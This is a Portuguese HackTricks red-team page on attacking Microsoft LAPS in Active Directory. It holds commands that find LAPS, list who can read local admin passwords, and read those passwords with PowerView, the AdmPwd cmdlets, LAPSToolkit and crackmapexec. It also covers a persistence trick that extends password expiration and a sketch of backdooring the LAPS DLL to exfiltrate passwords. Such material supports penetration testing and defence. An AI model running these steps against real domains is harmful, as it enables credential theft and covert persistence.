hacktricks/windows-hardening/active-directory-methodology/laps.md

9.3 KiB

LAPS

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Informações Básicas

Local Administrator Password Solution (LAPS) é uma ferramenta usada para gerenciar um sistema onde as senhas de administrador, que são únicas, aleatórias e alteradas com frequência, são aplicadas a computadores associados a um domínio. Essas senhas são armazenadas de forma segura dentro do Active Directory e só são acessíveis a usuários que tenham permissão concedida por meio de Listas de Controle de Acesso (ACLs). A segurança das transmissões de senha do cliente para o servidor é garantida pelo uso do Kerberos versão 5 e do Padrão de Criptografia Avançada (AES).

Nos objetos de computador do domínio, a implementação do LAPS resulta na adição de dois novos atributos: ms-mcs-AdmPwd e ms-mcs-AdmPwdExpirationTime. Esses atributos armazenam a senha de administrador em texto simples e seu tempo de expiração, respectivamente.

Verificar se ativado

reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

dir "C:\Program Files\LAPS\CSE"
# Check if that folder exists and contains AdmPwd.dll

# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname

Acesso à Senha do LAPS

Você pode baixar a política LAPS bruta de \\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol e então usar Parse-PolFile do pacote GPRegistryPolicyParser para converter este arquivo em um formato legível para humanos.

Além disso, os cmdlets nativos do LAPS PowerShell podem ser usados se estiverem instalados em uma máquina à qual temos acesso:

Get-Command *AdmPwd*

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

# List who can read LAPS password of the given OU
Find-AdmPwdExtendedRights -Identity Workstations | fl

# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

PowerView também pode ser usado para descobrir quem pode ler a senha e lê-la:

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd

LAPSToolkit

O LAPSToolkit facilita a enumeração do LAPS com várias funções. Um desses é analisar ExtendedRights para todos os computadores com o LAPS ativado. Isso mostrará grupos especificamente delegados para ler senhas do LAPS, que frequentemente são usuários em grupos protegidos. Uma conta que tenha associado um computador a um domínio recebe Todos os Direitos Estendidos sobre esse host, e esse direito dá à conta a capacidade de ler senhas. A enumeração pode mostrar uma conta de usuário que pode ler a senha do LAPS em um host. Isso pode nos ajudar a direcionar usuários específicos do AD que podem ler senhas do LAPS.

# Get groups that can read passwords
Find-LAPSDelegatedGroups

OrgUnit                                           Delegated Groups
-------                                           ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL                DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL           DOMAIN_NAME\LAPS Admin

# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName                Identity                    Reason
------------                --------                    ------
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\Domain Admins   Delegated
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\LAPS Admins     Delegated

# Get computers with LAPS enabled, expirations time and the password (if you have access)
Get-LAPSComputers
ComputerName                Password       Expiration
------------                --------       ----------
DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41

Extraindo Senhas do LAPS com o Crackmapexec

Se não houver acesso ao powershell, você pode abusar desse privilégio remotamente através do LDAP usando

crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps

Persistência do LAPS

Data de Expiração

Uma vez com privilégios de administrador, é possível obter as senhas e impedir que uma máquina atualize sua senha ao definir a data de expiração para o futuro.

# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime

# Change expiration time
## It's needed SYSTEM on the computer
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}

{% hint style="warning" %} A senha ainda será redefinida se um administrador usar o cmdlet Reset-AdmPwdPassword; ou se Não permitir que o tempo de expiração da senha seja maior do que o exigido pela política estiver habilitado na GPO do LAPS. {% endhint %}

Backdoor

O código-fonte original do LAPS pode ser encontrado aqui, portanto é possível colocar um backdoor no código (dentro do método Get-AdmPwdPassword em Main/AdmPwd.PS/Main.cs, por exemplo) que de alguma forma exfiltre novas senhas ou as armazene em algum lugar.

Então, basta compilar o novo AdmPwd.PS.dll e fazer o upload para a máquina em C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll (e alterar a hora da modificação).

Referências

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!